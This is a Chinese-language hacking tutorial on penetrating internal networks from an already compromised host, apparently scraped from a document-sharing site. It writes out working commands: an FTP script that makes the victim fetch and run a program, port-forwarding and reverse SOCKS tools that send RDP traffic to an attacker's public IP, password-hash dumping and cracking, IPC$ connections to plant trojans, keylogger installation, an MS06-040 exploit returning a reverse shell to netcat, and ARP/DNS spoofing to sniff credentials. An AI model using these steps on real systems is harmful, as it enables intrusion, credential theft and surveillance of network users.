XX内网渗透Word文档下载推荐.docx
《XX内网渗透Word文档下载推荐.docx》由会员分享,可在线阅读,更多相关《XX内网渗透Word文档下载推荐.docx(38页珍藏版)》请在冰点文库上搜索。
执行ipconfig/all果然有内网IP,图7。
既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具,都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也可以在本机架FTP服务器,用到20cn的FTP服务器,图8。
设置好用户和密码后cmdshell里执行:
echoo你架设FTP的IP>
ftp.txt
echohacklu>
>
ftp.txt //写入ftp.txt用户名
echo123456>
ftp.txt //写入ftp.txt密码
echobin>
ftp.txt //二进制方式转输
echoget11.exe>
ftp.txt //将11.exe下载到肉鸡
echobye>
ftp.txt //断开FTP
typeftp.txt //查看写入是否有错误
ftp-s:
ftp.txt
//执行FTP.TXT里的内容
delftp.txt
//删除ftp.txt
这样我们就可以把11.exe下载到肉鸡运行就可以了,也可以用0803期杂志提到的VBS工具,适合不超过300KB的程序。
把EXE转成BAT在上传,工具运行好会自动判断是2000系统或者2003系统,2000系统则自己重启,也可以自定义终端端口,运行结果如图9所示。
在执行netstat-an发现3389开放,当然这样直接连是连接不上的,因为我们外界是无法直接访问到内部机器的,但可以让内网机器来访问我们,比如现在流行的反弹木马,这样就需要我们做端口映射,说到端口映射工具当然代表作就是LCX写的工具了,首先在本机执行lcx-listen999833,在肉鸡上执行lcx-slave123.114.120.115127.0.0.1993389,意思是在本机监听99和9833端口,把99端口数据转到9833上面,然后把肉鸡的3389端口数据转到本机的99端口上,然后就可以拿连接器连接本地的9833端口了,如图10所示。
而奇怪的是这次却没有连上,那就用下教主的高级内网渗透工具Paris,工具其他功能不多说了,只说下端口映射的功能,传msxidc和vVXDc.dll到目标内网机器,在目标机器执行:
msxidc-l127.0.0.1-p3389-m82-s61.149.230.28-r22,在自己机器或者有公网IP的肉鸡:
MAPServer.EXE-p22,这时候只要连接本机的或者公网IP肉鸡的22端口就可以了,在说一款比较不错的工具,htran.exe,能开启Socks5服务,但我们只说端口映射,命令:
在公网肉鸡监听(临听任意两个端口):
htran-p-listen119120,在内网的机器执行:
htran-p-slave公网肉鸡IP119127.0.0.13389,这样是把这个内网肉鸡的3389转发到公网肉鸡或者自己机器的119端口上,然后再用3389登陆器连接公网肉鸡的120端口。
或者连接本机的120端口,如图11所示。
这几款工具各有优势,大家在渗透的时候根据需要自己选择吧。
端口映射大家在渗透的时候可能已经不少朋友用过了,但很少看到有人是直接反弹代理来连接,反弹socks代理好处是我们直接可以连接内网的其它机器,而不需要在去转端口。
最近“凋凌玫瑰”写了一个内网渗透利器---hd,使用方法如下,首先在本机监听:
c:
\>
hd-s-listen531180
[+]ListeningConnectBackPort53......
[+]ListenOK!
[+]ListeningSocks5AgentPort1180......
[+]Listen2OK!
[+]WaitingforMainSocketonport:
53......
此命令是将连接进来的53端口的数据包连接到1180端口。
在对方机器上运行:
C:
\RECYCLER>
hd-s-connectx.x.x.x53
[+]MainSocketConnecttox.x.x.x:
53Success!
[+]SendMainCommandok!
[+]RecvMainCommandok!
[+]SendMainCommandagainok!
上面的x.x.x.x为你的外网ip,这时我们接收到反弹回来的代理显示的情况。
如图12。
然后在本机设置sockscap,设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。
如直接用mstsc连接内网其它机器的3389,就可以上去登录管理。
如图13,14所示。
进了3389后我们第一步需要干什么?
可能很多朋友都是留后门,像什么上帝之门、SHIFT后门,记录3389帐号等等。
当然留什么后门好不在本文讨论之中。
我个人比较喜欢抓HASH(哈希),一般是pwdump+lc5,一般我破解的时候数字加字母的10位组合在3个小时左右就可以破得出来,而且现在还有破解HASH的彩虹表,不过体积是很庞大的,在有前段时间在网上看见一篇文章,文章名字是“卸载补丁去除保护获取Windows2003密码”,大致意思是卸载Windows2003SP1/SP2,因为windows2003+SP0才可以利用findpass从winlogin进程中抓出系统账号明文密码,抓出密码在重安装上补丁。
我个人没有实验过,此方法很暴力,我个人也不推荐这么做,很容易被发现的。
那什么是HASH呢?
Hash简单点讲就是把任意一段数据经过某种算法生成一段唯一的固定长度的数据。
Hash,一般翻译做"
散列"
,也有直接音译为"
哈希"
的,通过散列算法,变换成固定长度的输出,该输出就是散列值。
HASH主要用于信息安全领域中加密算法,他把一些不同长度的信息转化成杂乱的128位的编码里,叫做HASH值.也可以说,hash就是找到一种数据内容和数据存放地址之间的映射关系。
对于哈希菜鸟也可以这么理解,即保存电脑上管理员登录的一种加密后的密码,至于什么详细加密算法,有兴趣的朋友可以XX下,例如我这里用的是SAMInside抓HASH,程序打开后我们选择小人这里,点击使用LSASS输入本地用户,如图15。
这样计算机的用户名和HASH值就会出现在列表里,如图16。
直接点右上方的开始就可以破解密码了,图17所示,
也可以导出用LC5破解,在选择--文件--输出用户到PWDUMP,这样把HASH保存为文件文件,图18。
也可以用PWDUMP抓,如图19,
最后我们把内容复制下来保存文本文件用LC5破解,LC5的安装非常的简单,一直下一步即可。
程序自己带注册机,我们在注册一下,完事后我们在程序主页面导入刚才保存的hash.txt,点击导入按钮(第六个),在选择从PWDUMP文件,用户列表就会显示出来了,在点击开始就可以破解了,如
图20,21所示。
而对于2000的系统我们直接可以用MT读出密码,直接运行mt-findpass,如图22所示
,为什么要破解本机密码,因为在内网渗透的过程中抓出一台管理员的密码是很重要的,现在我们有了内网一台机器了,当然要继续渗透下去,在这里我总结一下几种方法,方法一、扫描弱口令,ipc$连接。
方法二、靠自己的运气和管理员的懒惰加社会工程学。
方法三、溢出。
方法四、arp欺骗,DNS欺骗。
方法五、域结构下的渗透。
这里简单的总结五方面,但是每一方面具体利用起来又包括很细节在里面。
方法一、扫描弱口令,ipc$连接。
可以用XScan-v3.3扫描器扫一下内网,设置好IP和端口,端口设置可以查看本机装有什么软件,例如本机装有radmin,pcAnywhere等等,那我们就扫描4899,5631等端口,如图23,
然后用本机的知道的密码去连接。
当然如果改成别的端口我们根据情况转换一下,有的时候在外网的机器很坚固,到了内网的时候就很脆弱了。
当然现在机器已经很少弱口令了,但是我们有本机管理员帐户和密码,管理员为了方便往往都设置成一样的,因为做系统的时候做完一台直接GHOST别的系统。
而ipc$连接可以是说是非常古老和经典的。
IPC是InternetProcessConnection的缩写,也就是远程网络连接。
WindowsNT/2000/XP/2003默认都提供了IPC$管道连接,就是在两个计算机进程之间建立通信连接。
打个比方,IPC连接就像是挖好的地道,程序可通过地道访问远程主机。
默认情况下,IPC是共享的,也就是说微软已经为我们挖好了这个地道(IPC),因此,这种基于IPC的入侵也常常被简称为IPC入侵。
IPC后面的$是共享的意思,不过是隐藏的共享,微软系统中用“$”表示隐藏的共享,比如C$就是隐藏的共享C盘。
也就是说C盘是共享的。
ipc$连接这个只能说是管理员开的共享,严格来说不能算一个漏洞,目标主机还需满足两个条件:
1、目标主机开启了ipc$共享;
2、拥有目标主机的管理员帐号和密码。
当年在2000系统的时候ipc$入侵可以说是风扉一时。
这里我用两台XP做演示,打开命令提示符在CMD下输入:
netuse\\IP\ipc$"
password"
/user:
"
username"
建立非空连接,接着copy\路径\*.exe\\IP\共享目录名,向远程主机复制文件,接着nettime\\IP,查看远程主机的当前时间,图24所示
,接着就可以用计划任务运行我们COPY过去的程序了,执行at\\ip时间程序名,远程添加计划任务,图25所示。
可以按照我们规定的时间内运行程序,如果对方禁止了计划任务,默认是开启的,我们可以把文件复制到对方启动目录,先执行netusez:
\\IP\c$,是把对方C盘映射到本机Z盘上,这样我们直接将木马放在启动目录,如图26所示。
等复制完了想断开了可以用命令,netusez:
/del/y,这样可以删除映射的z盘如果有朋友也手工输入命令麻烦,也可以用20CN的IPC扫描器,可以同步植入木马。
如图27所示。
在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。
后面会介绍域环境下的渗透。
方法二、靠自己的运气和管理员的懒惰加社会工程学。
(推荐非安全出的黑客社会工程学攻击一书)
这里所说的运气是刚才说过的,比如说管理员为了方便设置“密码一卡通”扫描内网开3389端口的机器,用破出来的本机密码连接所有开3389的机器,我曾经入侵一个台湾的内网就是密码都是一样的,或者可以在本机装上键盘记录,安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB网页密码等等,这样也可以得到管理员的很多信息。
这里我用的是键盘记录大师,首先运行keyboardlog.exe,然后点"
开起监控"
,注意这个程序只要运行一次就可以了,以后开机的时候自动运行。
程序运行后如图28的界面,
我们点击开始监控就可以了。
这个工具可以记录中文,这点对于有些机器还是不错的,记录的文件可以设置,方法为修改config.ini里的文件.格式为如c:
\1111.txt,然后再运行keyboardlog.exe,点击停止监控,然后再重新点开始监控。
如图29是记录到的内容。
至于记录的什么内容就要靠大家去分析然后配合社会工程学了。
方法三、内网溢出。
溢出从技术角度可以分为堆溢出和栈溢出,这点我们先不说,从另一个角度则分为远程(remote)溢出和本地(local)溢出,远程溢出也就是通过对方的一些网络上的服务对我们提交的的数据没有严格的检查,我们提交一些精心构造的数据,可以迫使对方的主机执行我们指定的动作:
比如添加用户,打开端口,反弹一个SHELL给我们等等。
这种方法放在现在来说可以说是成功率很低的,因为现在基本都是自己打补丁了,如果在向后退个二三年还是可以的,但并不代表没有一点不可能,06的时候朽木在腾讯内网的时候就是靠嗅域管理员的哈希和MS06035溢出其他的机器,对于比较火的05年的MS05039,06年的MS06035、06040,07年DNS溢出等等,这就需要我们多关注一下“微软漏洞发布的地方,当然内网溢出不一定非得靠系统漏洞,可以查看本机装有那些第三方程序,然后溢出其他机器的,这里我以06040+2000系统为例,首先我们用Superscan3.0扫描内网开放445端口,如30所示。
在本机用NC监听1234端口,执行nc-l-v-p1234,如图31,
然后用另一个CMD窗口执行,ms06040rpc对方IP本机IP12341,这样用NC监听的端口会返回了对方的CMDSHELL,如图32、33所示。
在得到CMDSHELL之后,是添加用户或者给机器中木马,就看见大家爱好了。
另外也可以用去年比较火的DNS溢出,DNS服务一般开放53端口。
DNS服务器在有的时候就是域服务器,关于域环境下参考方法五。
方法四、arp欺骗,DNS欺骗。
这个方法是比较实用,所以多介绍一下。
但同是也是比较容易暴露自己的,不少同行在C段方面和内网方面用的都是ARP欺骗,不少菜菜可能还记得杂志经常看到嗅探的时候用到的ARP欺骗,我们再来复习一下吧。
首先在内网机器输入arp-a,如图34所示。
这里第一列显示的是ip地址,第二列显示的是和ip地址对应的网络接口卡的硬件地址(MAC),第三列是该ip和mac的对应关系类型。
可见,arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议,或者说ARP协议是一种将ip地址转化成MAC地址的一种协议。
它靠维持在内存中保存的一张表来使ip得以在网络上被目标机器应答。
1、什么是MAC地址、MAC地址也叫物理地址,硬件地址或链路地址,同网络设备制造商生产时写在硬件内部。
IP地址与MAC地址在计算机里都是以二进制表示的。
IP地址是32位的,而MAC地址则是48位的。
MAC地址的长度为48位(6个字节),通常表示为12个16进制数,每2个16进制之间用冒号隔开,如08:
00:
20:
0A:
8C:
6D就是一个MAC地址,其中前3位16进制数08:
20代表网络硬件制造商的编号,它由IEEE(电子与电子工程师协会)分配,而后3位16进制数0A:
6D代表该制造商所制造的某个网络产品(如网卡)的系列号。
输入ipconfig/all就可以看见本机的MAC地址。
2、什么是ARP,大家都知道计算机通信是要有IP地址的吧!
可是在局域网中,计算机之间的通信是只靠MAC地址来发送数据的。
ARP是一种协议,用来实现IP地址到MAC地址的转换,假设192.168.1.1要发一个数据给192.168.1.101,它就会发出ARP广播包问:
“谁是192.168.1.101?
我要你的MAC地址!
”这时候192.168.1.101会回答:
“我是192.168.1.101,我的MAC是AA-AA-AA-AA-AA-AA。
”然后192.168.1.1就会把这个回答记录下来,然后再发数据给192.168.1.101的时候就直接构造目地地址为AA-AA-AA-AA-AA-AA的数据包发送。
3、什么是ARP欺骗、经过刚才的ARP查询的过程我们知道,在询问的过程中,国为不知道到底谁才是192.168.1.101,所以192.168.1.1发出的是广播包来询问,其它的电话虽然也收到了这个包但是并不回答。
假如现在有个人,192.168.1.102居心不良,想冒充192.168.1.101,他也可以给192.168.1.1发一个回答的数据包说:
“我才是192.168.1.101,我的MAC地址是BB-BB-BB-BB-BB。
”那么192.168.1.1就会把原先的那条记录从MAC地址表中删除掉,写入新的这个地址对应关系,这就是ARP欺骗。
4、什么是网关、在局域网中,所有的电脑可能是共用一个网络出口,这个出口就是网关了。
网关可以是一台电脑,也可以是一个路由器的某个接口,它一样有自己的IP地址,局域网中所有的要发到外部的数据包都直接递交给网关,网关负责将这个数据包传递到远程网络,再将外界返回的数据分发给局域网中的指定电脑。
TCP/IP协议是如此的脆弱,ARP协议在设计的当初并没有充分的考虑到安全问题,所以今天才出现N多的ARP欺骗工具,在介绍工具之前,我们再来谈谈服务器在机房中的情况。
一般而言,现在流行的的主机托管方式置放的服务器是和很多别的服务器放在一个机柜上,大家共用一个交换机共享100M的带宽,这样就造成了一个问题,那些没有做端口隔离的的机房(绝大多数机房都是这样的)每个交换机下的所有服务器构成一个局域网。
在这个局域网下,大家就可以玩ARP欺骗了。
说到ARP嗅探的工具要先提一下有一定的位置的cain,官方最新版为4.918,我们先要进行安装,如图35所示。
直接NEXT下一步就可以了,安装好我们运行CAIN,点击Sniffer,在选择工具栏第二个按钮,在点击十字架,在弹出对话框中我们选择子网中所有计算机,如图36所示。
在Configure选项里我们可以根据需要选择端口,如21、80、3389等。
如图37所示。
这时在选择下面的ARP,十字按钮是灰色的,我们点击一下空白处,在选择十字按钮,在弹出的对话框里左边选择网关,右边选择欺骗的IP。
最后点开始嗅探,上面第二个按钮。
如图38所示。
这样就能嗅到数据了,图39是嗅到的HTTP密码。
另外如果嗅到了3389密码我们在上面打开文档,在里面可以找到密码,如图40所示。
大家在用CAIN嗅探的时候可能遇到过这样的情况,数据一大就当机了,过了很少时间都连不上了,所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。
这样会大大的减少当机的可能性。
如果看到丢包率超过10%就要注意啦,赶紧停掉,看看那里没设置好吧。
另外提供一个“chong”写的BAT程序,在开嗅的时候运行它就可以了。
======start=========
:
ping
ping
IFERRORLEVEL
1GOTOreboot
0GOTOping
reboot
iisreset/reboot
======end=========
这里的你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping如果不通的话就认为当机了(事先自己先测试下)。
在说下DSN欺骗,我们看下DNS是怎样工作的,DNS是全称是DomainNameServer,既域名服务器。
当一台主机发送一个请求要求解析某个域名时,他会首先把解析请求发到自己的DNS服务器上。
如果内网里的192.168.1.101要访问XX,但不知道其IP地址,这时192.168.1.101主机询问网关192.168.1.1,的IP是多少,如果这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页木马的IP,这样就实现了DNS域名欺骗。
首先用前面的介绍的列出内网机器,然后在ARP里选择ARP-DNS,点击空白处激活十字按钮,弹出一个DNS欺骗对话框,在请求DNS域名栏中填入对方要访问的网站,如,然后在用来改写响应的IP地栏,如图41所示。
而我们响应的地址可以是一个网页木马的地址,这里我以网关为例,也就是说192.168.1.101访问的时候会转向192.168.1.1的页面,我们先来访问一下192.168.1.1,如图42所示,
升级会员 